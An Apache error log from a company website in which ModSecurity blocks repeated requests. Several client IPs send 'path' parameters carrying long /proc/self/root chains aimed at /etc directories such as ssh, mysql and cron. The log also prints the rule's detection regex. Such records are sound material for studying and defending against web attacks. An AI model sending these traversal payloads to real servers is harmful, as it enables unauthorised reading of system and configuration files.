[Tue Mar 17 20:43:23.131956 2026] [:error] [pid 17653:tid 140411716749056] [client 74.7.243.128:59980] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnnG8df6f5d65gmYZRiRAAAAsM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 20:43:38.131460 2026] [proxy_fcgi:error] [pid 19507:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:36160] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:43:39.967664 2026] [:error] [pid 31803:tid 140411632822016] [client 74.7.243.128:49604] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnnK-yqAr6etmhZHNpMbwAAAE0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:44:00.125789 2026] [proxy_fcgi:error] [pid 29151:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:36420] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:44:22.125815 2026] [proxy_fcgi:error] [pid 26799:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:36620] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:44:29.772978 2026] [:error] [pid 19507:tid 140411616036608] [client 74.7.243.128:56992] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnnXdY0UrI5A3LftIwlOAAAAY8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:44:44.133807 2026] [proxy_fcgi:error] [pid 25836:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:36810] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:45:06.133122 2026] [proxy_fcgi:error] [pid 2598:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:37046] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:45:06.854313 2026] [:error] [pid 6296:tid 140411666392832] [client 74.7.243.128:59156] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnngnIk7brgkOH-rIWyOAAAAUk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:45:28.114398 2026] [proxy_fcgi:error] [pid 11088:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:37284] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:45:32.124047 2026] [:error] [pid 25836:tid 140411624429312] [client 74.7.241.31:60632] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnnnIh-PF_25v4hFRCQSQAAAQ4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:45:32.809285 2026] [:error] [pid 29151:tid 140411666392832] [client 74.7.243.128:49272] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnnnPPqhzTj3BvfDX-uLwAAAck"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 20:45:35.720791 2026] [:error] [pid 29151:tid 140411725141760] [client 74.7.241.31:35800] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnnn_PqhzTj3BvfDX-uNwAAAcI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:45:37.135069 2026] [:error] [pid 11088:tid 140411716749056] [client 74.7.241.31:35808] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnnoWmqtCojLHvu5cKPAAAAAIM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:45:50.130291 2026] [proxy_fcgi:error] [pid 19507:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:37602] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:45:54.670790 2026] [:error] [pid 11816:tid 140411574073088] [client 74.7.241.31:35546] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnnsuw_le52K8_3pV1ybAAAAhQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:46:13.069863 2026] [proxy_fcgi:error] [pid 2598:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:38084] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:46:35.129900 2026] [proxy_fcgi:error] [pid 25836:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:38478] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:46:56.924221 2026] [:error] [pid 29151:tid 140411574073088] [client 74.7.241.31:44870] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnn8PPqhzTj3BvfDX-uigAAAdQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:46:57.125909 2026] [proxy_fcgi:error] [pid 31803:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:38774] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:47:19.129783 2026] [proxy_fcgi:error] [pid 11816:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:39080] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:47:24.021981 2026] [:error] [pid 29151:tid 140411557287680] [client 74.7.243.128:49272] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnoDPPqhzTj3BvfDX-ulAAAAdY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:47:25.676262 2026] [:error] [pid 2598:tid 140411641214720] [client 74.7.243.128:60440] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnoDRj0p0SRWAqcjGGfsQAAAww"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:47:41.125797 2026] [proxy_fcgi:error] [pid 31803:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:39398] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:48:03.125802 2026] [proxy_fcgi:error] [pid 11088:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:39710] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:48:25.069806 2026] [proxy_fcgi:error] [pid 31803:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:40050] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:48:35.441468 2026] [:error] [pid 29151:tid 140411666392832] [client 74.7.243.128:60456] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnoU_PqhzTj3BvfDX-u1AAAAck"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:48:47.055919 2026] [proxy_fcgi:error] [pid 11816:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:40392] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:49:09.041825 2026] [proxy_fcgi:error] [pid 19507:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:40724] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:49:31.147665 2026] [proxy_fcgi:error] [pid 2598:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:41060] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:49:53.121305 2026] [proxy_fcgi:error] [pid 2598:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:41398] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:49:59.665248 2026] [:error] [pid 25836:tid 140411565680384] [client 74.7.243.128:40116] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnop4h-PF_25v4hFRCQzgAAARU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:50:08.287113 2026] [:error] [pid 31803:tid 140411607643904] [client 74.7.243.128:57246] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnosOyqAr6etmhZHNpM8wAAAFA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 20:50:15.125841 2026] [proxy_fcgi:error] [pid 26799:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:41746] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:50:16.295154 2026] [:error] [pid 11816:tid 140411716749056] [client 74.7.241.31:37318] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnouOw_le52K8_3pV1zAQAAAgM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 20:50:37.097815 2026] [proxy_fcgi:error] [pid 26799:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:42014] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:50:47.347996 2026] [:error] [pid 25836:tid 140411658000128] [client 74.7.241.31:56302] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abno14h-PF_25v4hFRCQ7QAAAQo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:50:59.132826 2026] [proxy_fcgi:error] [pid 25836:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:42342] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 20:51:03.302833 2026] [:error] [pid 17653:tid 140411649607424] [client 74.7.241.31:45116] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abno58df6f5d65gmYZRi2gAAAss"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 20:51:04.255277 2026] [:error] [pid 17653:tid 140411574073088] [client 74.7.241.31:45116] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abno6Mdf6f5d65gmYZRi2wAAAtQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
